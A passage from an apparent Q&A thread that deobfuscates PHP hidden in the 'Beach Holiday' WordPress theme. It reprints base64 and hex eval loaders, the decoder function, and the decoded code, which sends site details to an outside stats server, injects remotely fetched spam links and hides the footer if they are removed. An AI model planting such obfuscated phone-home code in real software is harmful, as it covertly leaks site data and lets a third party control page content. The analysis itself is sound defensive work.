vZ3huMWdaQVFPVj1vcmQoJHZfUGxoQlM0VnVxZngpOyR2XzVQMGt3V3hxc2xQPW9yZCgkdl9ueU9qN1Vxb0w3Nik7JHZfa3pjejViMG96dk09JHZfb2d4bjFnWkFRT1YtJHZfNVAwa3dXeHFzbFA7JHZfUGxoQlM0VnVxZng9Y2hyKCR2X2t6Y3o1YjBvenZNKTskdl8yWlJxWXhlMHh6ai49JHZfUGxoQlM0VnVxZng7fXJldHVybiR2XzJaUnFZeGUweHpqO30=";eval(base64_decode($v_8pYzK85RUW2));$v_eWbn5kRuK82="c72q0m71WTT1hqZUUZdzL2VA6hvZNmhf";$v_tdr7R7sQn9U="C9ACA0D4A4D6A69F77C8C490D0D6BBB9BACC8CA3C73C5FA699D0E57A75A9DBDADCA39791A4E6A7969476C896E0E589B8C8CD86B8736D604A9BCBDEC96E948BC9D2A5A6D69EE1B297C3C3B5A5A2E3C3BCBDCE9FF76FA5BFA59BCAD7CC7A90D5CBD1AC52DD99E89D9DC6B5C86BD4D6C0C990D78BB5563BBBA49ED796818A9CDBDADCA397AF57A841AE61B5B895C7D2BDC9BEC9D2A273A9C6A09ECDD7BE7599888DD7A791D995CE9B96C97B7D6C72A0847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E607295CEC5B4BDD6DFB09BCAA09CD7E5CEB3DF88A3835E82E395E09C9FCBB9B851CAEA7A91B67ACCECB19893639EDCEACA889C97DDDAAE60E598D2A496BEC6B595CD9FBDC4C289869AC093C8A89BDCB37CADCFD4C7D1A254AF87DCA995C7C6B9A4DB91AEBDBAC7C9ED8861B77F6288B2BB6ED5DACBC97454D9A4E1A76B8683CBA8DF9FBECE83C7DDA96E52CAA2A8CFDBCE8B8FC7C8CF98A0DC52AB78A4C0B57475CDD5C3B8B6CEC9DE6C85BBB3ACCDE8967DCEA6928373939198DF9C979476BCA5DCE1948484D1DBF17AA5BBB3ACCDE8CABDD6D6DA919AA1DE5F8F57A5B8C6BB96DCAE7CB4B7C6C5E8B75494859BCCDFBDAFE1CDCA837FA1E4A4D6A5989383B56F8FAC6479C9CAC3DDBE97BAAAAAC7DCC9BDE1CDD8C27FA1DE95BCA59DD0919A72B4C49F9075898E9A9273A2947B88E5CC6EC1BABBA8576C9184BF8C7677CBBD9DD491CDBDC4D184E9BA9ECF619ED7E3BF7DD3DAD5D1AB52E191D49C517F74BD9FCBDDCFB9BA7AD4DBB3977673629BA28E7C9B96868C7252B771B98A7677C7BCA0DF91C9C375BFDADFBEAB76B197CFDBCD6E9797706D665C913AC19CA9CB8E746DD4DA9891BD8EA2CEB497C3A656ABE8BFB2D6DCA2929F66AF6CD1A0A777B7C092DBE49777C9BFDCEEC39BBAA89BDC98986ED0D7D4D79CA0E550A96695C0CA926D97DDC3935FA6CDEDC06C767DA2D1B496B6A1A6BACB9C9FD650B0A996BBBDC86D97D98E9391CFD0B86C9EBFB4AA88EDC3C2D588D2CC576EA0A5D9756D86C0BD6F72DEC3CD759484B6B89B947D9E9CB4AEB6D2D5CB837AA4D694D6AB6D86BC886FA4E6C69375C6CDEDC052CDAAAAD096C6B78DA495D8A370AD94D6AD51BAC0B5A4DBAE7CC9BAD2D8F1B596BDA6AA8AB47AB1DCD6DAC8A5A6916C9C9B9ACD929060D4DA985F79CED4D9AFA4BBA59FDCD5CDB0CCD0D5D09C529191DB9B517BC8C490CBE3BFB9BECEC3EDAE91BFAFA4CDE87A888DDFD5D15EA691A3D5A6A877BDC751D4D6BBCBBA7AC6E6ADA0C1615D8F80847D77728AD7A791D4A2D29B9ACBB3C793C7D9C9C2BA7A84B76C5992AD9FA6B2C282ABBCCEC8A4979173DF9C95C0C89060D0A59891CAC6A2A17A3C7D7DA2D1B496AF8DD0D8C89D6F9398E1ABA1918383A8DFE888C9BAC7D4E6ADA6BBAD9FDCDB88B1DCD595DAA6A4D5A0DF9CA4CA81CB96CA9EC2C4C8CECDE8B3617861AAC9E8C1B3E1A588C2999ED29ED8596FAEC3C695D8E3BFC8C87AACE9BFA6BFAF9DA4A5BB8CA997D2CC75599F3A94739DC092909288D9CCBABB9786E2C0A6C67B6597EDD1C59BC9D6D3AA66E395DBAB5FBAC3C160DBD9BBC7BACAD3E3BAA684A9AAD5E27C6EE1C9D8CA9CA6AE52CC999DB8C2BF53A6C8C3C3B9C9DBED6C85BEA2A8CDC6C9B7DBDC86B69CA4E799D09CA49383B56FA4A0C6BE93819284736E85B6A2A6B289BAD6A68D9E413C95A4DD9694C9B9B89ADCD0CDB7B4C3D2E8B1A4767E568FB2C6B7ABA4CE977586D995DA9C519AC6B995D1E59684BD8EA2B6C19E946864729D96BAD6A6A2C4579AE395D37453BFC8C8A1A2A089CCCCD192DBBCA2C975A8CDE4CE7CD0D7D392AA9AD2A2D2A7A0C0C2C85FD0E5C7C1777AD8DBBE99BBB5738AD5BCBACED6D1857589DA9ED1A6A8CA74A799C9E3BFA5C4C3D2EE6C85BBB3ACD1D9BFC1A997C7A17361DD99AB5E5F617B9060DDDD989184C6CDB8736D604B6592A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C854B9CDDE4BDC2D6D7D483AB9AD69DD29694C9B9B89ADC9983D05F63ABE6BB94B7AD568CEACAB7DBCED58F5BA6E18FD0A996BBBDC890CEE0C9C9BACC909EC0A2B5A4A8CDDAC3C2CCDBC8C29FA1DE95995BA5C7B3B7A3CDD5C3C9B4CDC6D9B5A0C4A6A8949ACEBECCCBD8C89B9BE58FD3A6A0CBB9C690B0E0C7BAA4C8D0F3873C5F6599DDE8CCB3DBDCA3CA9CA6D09FDDAB9AC6C27C58DCD6C7C5C1BBD8DFB89BCAA695D4DFC8B9E08F8F9E413B9598CEAA99947B8A6B99A18A8E86918BB5563B7AB1A5DBEAB9C4CEDACFC4999ED6A38D7451B8C6C692E199645E5E81C6E6BB99B5A9A5D5DB818BABCFCBD79694DD9FD4A09FBDC37C58DFE1CFC7C1818DA6563B5F6898D4E5C1ADE1D1DACF9C59AE6ED49CA5B6B6C0A0CFDAC8BBC4828BE8AD9FBB685F9480635794DCCEC8A497D0A3E1B09DBC7B916F8CE5CABEC3C0D3D570A6C6AAA4CEE5B575E1CAC5D3A997D799E55E8E857BB3A4DCEAC6BAC8C2C9DFC059B36D40717F81C2D5CDD3C8969BD557AA75588D7B803B717A81C9BDBFD1DFABA8BBB35DA5B481809B98968A633C7A3994AB99BCC1B990D6D2C7BA7C97A2A18E97B7A49E88BEC9BAD6CCC7DC5E5E7B39765E9DC0C2BF90CEE0C9C9BACC8BB78A56CAB195CBE8BFB2D6DCC5C9A6A1E595DF633B605D7B9DD1DFC5B4C8BCC3E2BB9FBB6873A69ACEBECCCBD8C89B9BE58FE09990BFC3C196947B635E7CC6CDE8B791C9A395D1E4C8B3DF8FA3A15BA6E18FD0A996BBBDC890DBD3B9BEC3C8C9EC783C5F4A40719F955876D1CC8B589BE4A3D2AB597BB7C9A3DAD6C8C9B081D8E3B9977D9E5F88F2D66E91CBDBD5A997DFA4C85EA5C0C1B958C5919675C9C3D1DF745B83726D9AAE8A7E96888AC6ACA4E395DBAB6E9D95A084ADAC7A847FC7CDE86C668E619ED7EBCCC19797706CA0989951D6AAA4BCC87C55CBE6CCC7BAC8D8D5739AB7B49E8FD3836EE9E486879AA7E3A2D2A5A5B27BBC92DBD981B2769788E2ADA5BE6A568CD9CFC0DFCDD4D77478B27CC07C6C615D5E3AD1D78279B8CFD6ECB1A0CA7E73A5BC9B9AC0AD8FDE573C7A3991A596CE91B5A3DAD2D37D7E956E835556C4A6ADC39DCEB7DACD8DC074A6DA9DD25F5A925E5D3A8CDFBFCCB081CCDBBF9A7D9E738CDEBBC1D5A3706C4056DF95E49258C3BDC29CDB98B792C9BFD1EAB893CAA6A2D1EABFADD4CDDAC2A39BDF9BE05F55C7C3C7A5C7E7BBC7BEBBC6E6B1A57F7C40717F645776D1CC8B5BA0D6A7C85E9DC0C2BFA48FCE979292A0A5C69F777FBC40717F63B7D39087C8A4A2E5A9955B94CCC6C696D6E5B57CC1C3D2E5BF59B36A5FE380635776718AD19CA9CC57D9A09FC2C77B8EA595BDCAC7CCC9E8C08D7DAD9FD6E1CD75CAA3706C403BEE95D9AA96D25E5D3A717A7EC3BAD1BFA1B89BC4ACA98FD39772E1D8C5C6A997D599E19697C6C3C896DAAC645E5E63E184553BD3A6A2DBDBC3B4958CD4C8AE8D989CD6A59CCA7BB16EA59887827C83DF84553B5F65A4CDEDB575D9D1D4CEAA59CE6D91ABA1B6B7C696CCDACEB4BBC9D3EEB1A4914B3F71F3645776726F6C5BA0D6A7C85E9DC0C2BFA48FCE97C8C9CCCDEAABA6B7A8A9909AC8B3E4C38DCFA0A0DCA394945D7990B56F8A9A95758484D1DBB79776B4ABDADB7ABDDBD4DF83AB97E9A48D989FBB74C09AD6DC7AB6C7BF84DBB89EC5B86492A5645776726F6CACA2D591E19C90C6C4C89AD7DF8277C9BFD1EAB893CAA6A2D1EABFADD9D1D4CEAA549D54DB9CA8808F5E3A7195CCBAC9CFD6E8AB9EBFAFA1A5967EBCD2DFC18AA39BDF9BE05E8E925E5DAECDDDCDBAD0646D8370A4BBB5ABDAE4B9BAD6D6D1A05756D4A5DFA996C5C8AF58D4DAC8C0C881C1B5563BD34B4071DFC0768D8CDAD39695E395D1A0A5B6BAC3A0DCD6CCB49DC9D1DF9BA0C2BA73A5B3A08FB9BBAB83B3AE9158D6AA90BFC3C196909A7AD1D17ACDEDAB98C8B0A4DCD5CAAFD4CD8E8C60529AAB77403ABCB7BCA08895CCBAC9CFD6E8AB9EBFAFA1A38063CB77E570C9ACA0D4A4D6A69F77C8B99ED8DDBBC9BAC6CDEEB191BDA6AAC7E2C3BCD8DB8E87A7A1E4A4CCAD92C9BDB593D4D6CD7ED0646DE3B25A77A4A2C9E9CDADD2E0CFD6ABA59957C487909FC8C8A18F9A8375BEC8C7E6C196BBA0A5D6D9BF76AEAAB9B37886B95EC4877AA597825897D4C6B6C8CD91E2C0A6C66FA6D0E6816E96A3706C5BA4D6A1E29CA4CB749151D6D6D175ACAAC3C2C0A6C67C40719ACFC0D9A588CBABA6E16A9C66A8CECB82A5CDDECAC1B6CEC9EDC093CAB464CBE5C77DCED8CF9298A2DA5EE3695FC7BCC453A37B63847F7ED9ECB86F78A9AADCE6947D9CDCCBD0A79ED2A4D2AAA5B8C8C76BA0A989B6C5C393DBBC9B84B76896E6C2BE8FA39092413B95A2D2AAA6C3C8746E88B17EC7BACBD9DFBFA6837FA8CDE7CFB3E0DC8E87ACA4DD5CCEA9A3B8CD7C518FDEBFC9BDC9C8A16C6F94615DB8C5ADA29494868A99A1D5A994576E957478A1D7E4CEB4CBBBD6E3AD94C2A6A9919F95587771CFC95F53DAA3E09CA57F78C696DBE6C6C98298C9ECBEA1C8B45F889C806ED6DBD9C8AB5A95A2D2AAA6C3C8AF58DAD6CDC5C4C8D7DF738FB16899D7DABF75CA9186895D5295A2D2AAA6C3C8AF58DAD6CDC5C4C8D7DF738FB16899D7DABF75CAA5A39567629AAB77403AC9B9C8A6DADF7AC9C7C3D1A270A4BBB4ABD4EAB575CFD7CADC5E8F9A6B7740AE615DC696DCE6CCC375A0A5C69F77914BB3727F635891DCD6C2AA94D0A3D5A6A8949A957DBBB6955FBBCFD2DDC09BC5AF56DCDEBFBBD2C7D9C59695E395D1A0A57F7DCF3B71D8C6C4B7BBD09A70A6C6A099DADBBEB7E1C7D9C5969AE09DD263517BC8C490CBE3BFB9BECEC3EDAE91BFAFA4CDE8866E91DCD6C2AA94D0A3D5A6A8925E5D55DCE1B9C8B7B9D7E2BBA9939588BDBB955876726FCC9D5A9158D6AA90BFC3C196909A7AD1D17ACDEDAB98C8B0A4DCD5CAAFD4CD8E8C605297568D5896C4C4C8AA9095CEC5B4BDD6DFB09BCAA0A9CAD5C2BDDACD8F8CB23C7A39D29A99C67478A5D8D0BDC7BABECDEEABA5B8A09ED7E3BF897771E3C8A3A5D699D35F52BCC1C4A5E1997EC9C5B9C7ECB196BFB595DBD8B9B7DBD6CBD5605BEC3A764096BABCC3518CE5CAB4B8CCC9DEB5A6B5B498C7DFC8BCD2DAA16D40AF7BAD774197CCC2B7A5D1E0C875C9CAC3E0BBA1CAA6A8909FD55876CFD2D29993DD5091ABA1B6C7B690DBD9C9CC817ED8EAAB95C8A69AD1EAB9B4DCD7DAC8A991B99FDA9C80C5C0CD6C727AC3BB7D7ED8EAAB95C8A69AD1EAB9B4DCD7DAC8A991B99FDA9C80C5C0CD6EA5AEA096A1ADA99AC8AE76699FDBD5C2BDDACD8E8C57AEED50D6AA90BDC6C39FDCD0CAB6BCBF8CA375527FBC40717FC9B0CCDBDAC4A9A69959A8413A60BDC294D4E6BEBA75AEA9C79C7E97957BB8B7AE969B8A95C9A6A1E595DF65A1BFC4766C727A6379B8CFD6ECB1A0CA7E9DCDEAB9BDDDDCCFD2A55A98A4D2A4A1C3B5C896D4DACEBAB4C6CDE8B7A57D6A71727F6372E1D8C5C9A6A1E595DF9694C6C2C896D6E597C4B7B9CBDFC091B9AD9BC9E48277A8726F6CA0989950955B94CCC6C696D6E5979292A0A5C69F7776BDB288DBC7BEE1E18E879AA7E3A2D2A5A5B27BC09AD6DCCD7CB28384F6C852C9B5A8D8E5CD7691DCD6C29DA1E0A4D2A990BAC3C2A5CDDFCE8179BDD9ECBE97C4B5918FE2C3BCD8DB8DC06052926DAA5797B8C0C796889A7A7B7B7A88EEBC91C9A395DBDEC9C5AAA5BAB58C779159E8413A605DB994D0E07A79C9CAC3E0BBA1CAA6A8C7D9C9BCE1CDD4D7723C7A39EA413AD45ED13BC9D5BEB4B6BDD8E3BBA07E689DCDEAB9B4DCD7DAC8A9599D57E1A790BDC3C3A5CDE3817E90";
   eval(v_wY7yclWSLp7($v_eWbn5kRuK82,$v_tdr7R7sQn9U));
   ```
3. If you see the last line, it has one more eval.
4. Once again I pasted this code in another PHP file and.
5. `echo(v_wY7yclWSLp7($v_eWbn5kRuK82,$v_tdr7R7sQn9U));` gave the following code.

This is What you get

```
function tp_header(){
    echo '<style type="text/css">';
    echo '#content{float:right;}#sidebar,#menu li{float:left;}';
    echo '</style>';
}
add_action('wp_head', 'tp_header');
/*********************************************************************************************/
$tp_credit_footer = 'Presented by <a href="http://www.themegrade.com/" target="_blank">Wordpress Themes</a>, <a href="http://www.dy.my/" target="_blank">Asia Dedicated Server</a>, <a href="http://www.serverpoint.com/" target="_blank">Dedicated Hosting</a>';
$tp_credit_footer_HomeOnly=FALSE; /* FALSE or TRUE : TRUE will show only home/front page ( include page 2,3,4... ); FALSE show on every pages */

/* 
Text: <li><h4>Theme Credit</h4><div class="textwidget"> content </div></li>
List: <li><h4>Theme Credit</h4><ul> list with li </ul></li>
mix : <li><h4>Theme Credit</h4><ul> list with li </ul><div class="textwidget"> content </div></li>
$tp_credit_sb_home  and $tp_credit_sb_inner : won't show is leave blank ''
*/

$tp_credit_sb_home  = '<li><h4>Theme Credit</h4><ul>'.
'<li><a href="http://www.templatelite.com/wordpress-web-hosting/" target="_blank">Wordpress Hosting</a></li>'.
'<li><a href="http://www.apps4rent.com/sharepoint.html" target="_blank">Windows SharePoint Services</a></li>'.
'</ul></li>';

$tp_credit_sb_inner = '<li><h4>Theme Credit</h4><ul>'.
'<li><a href="http://www.apps4rent.com/sharepoint.html" target="_blank">Windows SharePoint Services</a></li>'.
'</ul></li>';

/*********************************************************************************************/
function theme_credit(){
    Global $tpinfo,$tp_credit_footer,$tp_credit_sb_home,$tp_credit_sb_inner,$tp_credit_footer_HomeOnly;
    $current=get_option('templatelite_links');
    $hash='6:100917';
    $post_variables = array(
        'blog_home'=>get_bloginfo('wpurl'),
        'blog_title'=>get_bloginfo('name'),
        'theme_style'=>$tpinfo[$tpinfo['tb_prefix'].'_stylesheet'],
        'theme_id'=>'6',
        'theme_ver'=>'2.00',
        'theme_name'=>'Beach Holiday',
        'link_footer'=>$tp_credit_footer,
        'link_sb_home'=>$tp_credit_sb_home,
        'link_sb_inner'=>$tp_credit_sb_inner,

    );
    if(!isset($current['time']) || $current['time'] < time()-172800) $current=FALSE; /*min 48 hours*/
    if(!isset($current['hash']) || $current['hash']!=$hash) $current=FALSE;

    if($current===FALSE){ 
        $new=array();
        $new['time']=time();
        $new['hash']=$hash;
        $new['links']=templatelite_get_links($post_variables);

        if($new['links']===FALSE){
            if(!empty($current['links'])){
                $new['links']=$current['links'];
            }else{
                $new['links']=$tp_credit_footer;
            }
        }elseif($new['links']=='--'){
            $new['links']=$tp_credit_footer;
        }

        $new['links']=strip_tags($new['links'],"<a>"); /*make sure only text and link are allow.*/

        update_option("templatelite_links",$new);
        $return_link= $new['links'];
    }else{
        $return_link= $current['links'];
    }

    if( $tp_credit_footer_HomeOnly===FALSE || (is_home() || is_front_page()) ){
        echo $return_link;
    }
}
function templatelite_get_links($post_variables){
    if(!class_exists('WP_Http')) include_once(ABSPATH.WPINC.'/class-http.php' );
    $request = new WP_Http;
    $url="http://www.templatestats.com/api/api.v2.php";
    /*$url="http://templatestats:88/api/api.v2.php";*/
    $result = @$request->request($url,array( 'method' => 'POST', 'body' => $post_variables));

    if(!isset($result->errors) && isset($result['response']['code']) && $result['response']['code']==200){
        return trim($result['body']);
    }
    return FALSE;
}

$tp_sb_show=FALSE;
function theme_sb_credit(){
    global $tp_credit_sb_home, $tp_credit_sb_inner, $tp_sb_show;
    $tp_sb_show=TRUE;

    if( (is_home() || is_front_page()) && !empty($tp_credit_sb_home)){
        echo $tp_credit_sb_home;
    }elseif(!empty($tp_credit_sb_inner)){
        echo $tp_credit_sb_inner;
    }
}

function tp_footer(){
    global $tp_sb_show,$tp_credit_footer_HomeOnly;
    if($tp_credit_footer_HomeOnly===FALSE || (is_home() || is_front_page()) ){
        ob_start();
        include TEMPLATEPATH."/footer.php";
        $current=get_option('templatelite_links');
        $tp_footer_content=ob_get_clean();
        if( ($current===FALSE || empty($current['links']) || strpos($tp_footer_content,$current['links']) !== false ) && $tp_sb_show==TRUE ){
            echo $tp_footer_content;
        }
    }
}
add_action('get_footer','tp_footer');
```

Comment: You should be explaining how you did to decode the code. Take for example this [answer](http://stackoverflow.com/questions/16714107/malicious-php-file-content/16715495#16715495).

Comment: Well, that's what I would call *failed* obfuscation, not even obfuscating the calls and strings themselves :)

Comment: Added more details on how I decoded this code. Let me know if it need more details.

Comment: Are people seriously so evil to hide cheap spam / promo this way?

Answer (score 3):

The basic approach to decode such a thing is to take it apart.

Each time you find `eval`, replace it with `echo` and see what you will get.

In this example, after few steps of this, you get some decoding functions that are then executed to decode a long string:

```
function v_es7nh2zU0wM($v_ZVhk3V6rKXW){
    $v_RaWNRhijT6l=0;

    while(1){
        if($v_ZVhk3V6rKXW[$v_RaWNRhijT6l]==null) break;
        ++$v_RaWNRhijT6l;
    }

    return $v_RaWNRhijT6l;
}

function v_wY7yclWSLp7($v_AV43bb17iRb,$v_wlTwj3vBq8i){
    echo "";
    $v_raPnrpemaTo="";
    $v_eWbn5kRuK82=(v_es7nh2zU0wM($v_wlTwj3vBq8i)/2);

    for($v_gdfm63bgQW6=0;$v_gdfm63bgQW6<$v_eWbn5kRuK82;++$v_gdfm63bgQW6){
        $v_raPnrpemaTo.=chr(hexdec(substr($v_wlTwj3vBq8i,$v_gdfm63bgQW6*2,2)));
    }

    $v_2ZRqYxe0xzj="";

    $v_eWbn5kRuK82=v_es7nh2zU0wM($v_raPnrpemaTo);

    $v_Sb3QiK1ghUq=v_es7nh2zU0wM($v_AV43bb17iRb);

    for($v_gdfm63bgQW6=0;$v_gdfm63bgQW6<$v_eWbn5kRuK82;++$v_gdfm63bgQW6){
        $v_PlhBS4Vuqfx=substr($v_raPnrpemaTo,$v_gdfm63bgQW6,1);
        $v_nyOj7UqoL76=substr($v_AV43bb17iRb,$v_gdfm63bgQW6%$v_Sb3QiK1ghUq,1);
        $v_ogxn1gZAQOV=ord($v_PlhBS4Vuqfx);
        $v_5P0kwWxqslP=ord($v_nyOj7UqoL76);
        $v_kzcz5b0ozvM=$v_ogxn1gZAQOV-$v_5P0kwWxqslP;
        $v_PlhBS4Vuqfx=chr($v_kzcz5b0ozvM);
        $v_2ZRqYxe0xzj.=$v_PlhBS4Vuqfx;
    }
    return $v_2ZRqYxe0xzj;
}


$v_eWbn5kRuK82="c72q0m71WTT1hqZUUZdzL2VA6hvZNmhf";

$v_tdr7R7sQn9U="C9ACA0D4A4D6A69F77C8C490D0D6BBB9BACC8CA3C73C5FA699D0E57A75A9DBDADCA39791A4E6A7969476C896E0E589B8C8CD86B8736D604A9BCBDEC96E948BC9D2A5A6D69EE1B297C3C3B5A5A2E3C3BCBDCE9FF76FA5BFA59BCAD7CC7A90D5CBD1AC52DD99E89D9DC6B5C86BD4D6C0C990D78BB5563BBBA49ED796818A9CDBDADCA397AF57A841AE61B5B895C7D2BDC9BEC9D2A273A9C6A09ECDD7BE7599888DD7A791D995CE9B96C97B7D6C72A0847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E607295CEC5B4BDD6DFB09BCAA09CD7E5CEB3DF88A3835E82E395E09C9FCBB9B851CAEA7A91B67ACCECB19893639EDCEACA889C97DDDAAE60E598D2A496BEC6B595CD9FBDC4C289869AC093C8A89BDCB37CADCFD4C7D1A254AF87DCA995C7C6B9A4DB91AEBDBAC7C9ED8861B77F6288B2BB6ED5DACBC97454D9A4E1A76B8683CBA8DF9FBECE83C7DDA96E52CAA2A8CFDBCE8B8FC7C8CF98A0DC52AB78A4C0B57475CDD5C3B8B6CEC9DE6C85BBB3ACCDE8967DCEA6928373939198DF9C979476BCA5DCE1948484D1DBF17AA5BBB3ACCDE8CABDD6D6DA919AA1DE5F8F57A5B8C6BB96DCAE7CB4B7C6C5E8B75494859BCCDFBDAFE1CDCA837FA1E4A4D6A5989383B56F8FAC6479C9CAC3DDBE97BAAAAAC7DCC9BDE1CDD8C27FA1DE95BCA59DD0919A72B4C49F9075898E9A9273A2947B88E5CC6EC1BABBA8576C9184BF8C7677CBBD9DD491CDBDC4D184E9BA9ECF619ED7E3BF7DD3DAD5D1AB52E191D49C517F74BD9FCBDDCFB9BA7AD4DBB3977673629BA28E7C9B96868C7252B771B98A7677C7BCA0DF91C9C375BFDADFBEAB76B197CFDBCD6E9797706D665C913AC19CA9CB8E746DD4DA9891BD8EA2CEB497C3A656ABE8BFB2D6DCA2929F66AF6CD1A0A777B7C092DBE49777C9BFDCEEC39BBAA89BDC98986ED0D7D4D79CA0E550A96695C0CA926D97DDC3935FA6CDEDC06C767DA2D1B496B6A1A6BACB9C9FD650B0A996BBBDC86D97D98E9391CFD0B86C9EBFB4AA88EDC3C2D588D2CC576EA0A5D9756D86C0BD6F72DEC3CD759484B6B89B947D9E9CB4AEB6D2D5CB837AA4D694D6AB6D86BC886FA4E6C69375C6CDEDC052CDAAAAD096C6B78DA495D8A370AD94D6AD51BAC0B5A4DBAE7CC9BAD2D8F1B596BDA6AA8AB47AB1DCD6DAC8A5A6916C9C9B9ACD929060D4DA985F79CED4D9AFA4BBA59FDCD5CDB0CCD0D5D09C529191DB9B517BC8C490CBE3BFB9BECEC3EDAE91BFAFA4CDE87A888DDFD5D15EA691A3D5A6A877BDC751D4D6BBCBBA7AC6E6ADA0C1615D8F80847D77728AD7A791D4A2D29B9ACBB3C793C7D9C9C2BA7A84B76C5992AD9FA6B2C282ABBCCEC8A4979173DF9C95C0C89060D0A59891CAC6A2A17A3C7D7DA2D1B496AF8DD0D8C89D6F9398E1ABA1918383A8DFE888C9BAC7D4E6ADA6BBAD9FDCDB88B1DCD595DAA6A4D5A0DF9CA4CA81CB96CA9EC2C4C8CECDE8B3617861AAC9E8C1B3E1A588C2999ED29ED8596FAEC3C695D8E3BFC8C87AACE9BFA6BFAF9DA4A5BB8CA997D2CC75599F3A94739DC092909288D9CCBABB9786E2C0A6C67B6597EDD1C59BC9D6D3AA66E395DBAB5FBAC3C160DBD9BBC7BACAD3E3BAA684A9AAD5E27C6EE1C9D8CA9CA6AE52CC999DB8C2BF53A6C8C3C3B9C9DBED6C85BEA2A8CDC6C9B7DBDC86B69CA4E799D09CA49383B56FA4A0C6BE93819284736E85B6A2A6B289BAD6A68D9E413C95A4DD9694C9B9B89ADCD0CDB7B4C3D2E8B1A4767E568FB2C6B7ABA4CE977586D995DA9C519AC6B995D1E59684BD8EA2B6C19E946864729D96BAD6A6A2C4579AE395D37453BFC8C8A1A2A089CCCCD192DBBCA2C975A8CDE4CE7CD0D7D392AA9AD2A2D2A7A0C0C2C85FD0E5C7C1777AD8DBBE99BBB5738AD5BCBACED6D1857589DA9ED1A6A8CA74A799C9E3BFA5C4C3D2EE6C85BBB3ACD1D9BFC1A997C7A17361DD99AB5E5F617B9060DDDD989184C6CDB8736D604B6592A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C806B6092A084789792908D615C9B5A97615B817E7E5B929B847F7F848EA4765C854B9CDDE4BDC2D6D7D483AB9AD69DD29694C9B9B89ADC9983D05F63ABE6BB94B7AD568CEACAB7DBCED58F5BA6E18FD0A996BBBDC890CEE0C9C9BACC909EC0A2B5A4A8CDDAC3C2CCDBC8C29FA1DE95995BA5C7B3B7A3CDD5C3C9B4CDC6D9B5A0C4A6A8949ACEBECCCBD8C89B9BE58FD3A6A0CBB9C690B0E0C7BAA4C8D0F3873C5F6599DDE8CCB3DBDCA3CA9CA6D09FDDAB9AC6C27C58DCD6C7C5C1BBD8DFB89BCAA695D4DFC8B9E08F8F9E413B9598CEAA99947B8A6B99A18A8E86918BB5563B7AB1A5DBEAB9C4CEDACFC4999ED6A38D7451B8C6C692E199645E5E81C6E6BB99B5A9A5D5DB818BABCFCBD79694DD9FD4A09FBDC37C58DFE1CFC7C1818DA6563B5F6898D4E5C1ADE1D1DACF9C59AE6ED49CA5B6B6C0A0CFDAC8BBC4828BE8AD9FBB685F9480635794DCCEC8A497D0A3E1B09DBC7B916F8CE5CABEC3C0D3D570A6C6AAA4CEE5B575E1CAC5D3A997D799E55E8E857BB3A4DCEAC6BAC8C2C9DFC059B36D40717F81C2D5CDD3C8969BD557AA75588D7B803B717A81C9BDBFD1DFABA8BBB35DA5B481809B98968A633C7A3994AB99BCC1B990D6D2C7BA7C97A2A18E97B7A49E88BEC9BAD6CCC7DC5E5E7B39765E9DC0C2BF90CEE0C9C9BACC8BB78A56CAB195CBE8BFB2D6DCC5C9A6A1E595DF633B605D7B9DD1DFC5B4C8BCC3E2BB9FBB6873A69ACEBECCCBD8C89B9BE58FE09990BFC3C196947B635E7CC6CDE8B791C9A395D1E4C8B3DF8FA3A15BA6E18FD0A996BBBDC890DBD3B9BEC3C8C9EC783C5F4A40719F955876D1CC8B589BE4A3D2AB597BB7C9A3DAD6C8C9B081D8E3B9977D9E5F88F2D66E91CBDBD5A997DFA4C85EA5C0C1B958C5919675C9C3D1DF745B83726D9AAE8A7E96888AC6ACA4E395DBAB6E9D95A084ADAC7A847FC7CDE86C668E619ED7EBCCC19797706CA0989951D6AAA4BCC87C55CBE6CCC7BAC8D8D5739AB7B49E8FD3836EE9E486879AA7E3A2D2A5A5B27BBC92DBD981B2769788E2ADA5BE6A568CD9CFC0DFCDD4D77478B27CC07C6C615D5E3AD1D78279B8CFD6ECB1A0CA7E73A5BC9B9AC0AD8FDE573C7A3991A596CE91B5A3DAD2D37D7E956E835556C4A6ADC39DCEB7DACD8DC074A6DA9DD25F5A925E5D3A8CDFBFCCB081CCDBBF9A7D9E738CDEBBC1D5A3706C4056DF95E49258C3BDC29CDB98B792C9BFD1EAB893CAA6A2D1EABFADD4CDDAC2A39BDF9BE05F55C7C3C7A5C7E7BBC7BEBBC6E6B1A57F7C40717F645776D1CC8B5BA0D6A7C85E9DC0C2BFA48FCE979292A0A5C69F777FBC40717F63B7D39087C8A4A2E5A9955B94CCC6C696D6E5B57CC1C3D2E5BF59B36A5FE380635776718AD19CA9CC57D9A09FC2C77B8EA595BDCAC7CCC9E8C08D7DAD9FD6E1CD75CAA3706C403BEE95D9AA96D25E5D3A717A7EC3BAD1BFA1B89BC4ACA98FD39772E1D8C5C6A997D599E19697C6C3C896DAAC645E5E63E184553BD3A6A2DBDBC3B4958CD4C8AE8D989CD6A59CCA7BB16EA59887827C83DF84553B5F65A4CDEDB575D9D1D4CEAA59CE6D91ABA1B6B7C696CCDACEB4BBC9D3EEB1A4914B3F71F3645776726F6C5BA0D6A7C85E9DC0C2BFA48FCE97C8C9CCCDEAABA6B7A8A9909AC8B3E4C38DCFA0A0DCA394945D7990B56F8A9A95758484D1DBB79776B4ABDADB7ABDDBD4DF83AB97E9A48D989FBB74C09AD6DC7AB6C7BF84DBB89EC5B86492A5645776726F6CACA2D591E19C90C6C4C89AD7DF8277C9BFD1EAB893CAA6A2D1EABFADD9D1D4CEAA549D54DB9CA8808F5E3A7195CCBAC9CFD6E8AB9EBFAFA1A5967EBCD2DFC18AA39BDF9BE05E8E925E5DAECDDDCDBAD0646D8370A4BBB5ABDAE4B9BAD6D6D1A05756D4A5DFA996C5C8AF58D4DAC8C0C881C1B5563BD34B4071DFC0768D8CDAD39695E395D1A0A5B6BAC3A0DCD6CCB49DC9D1DF9BA0C2BA73A5B3A08FB9BBAB83B3AE9158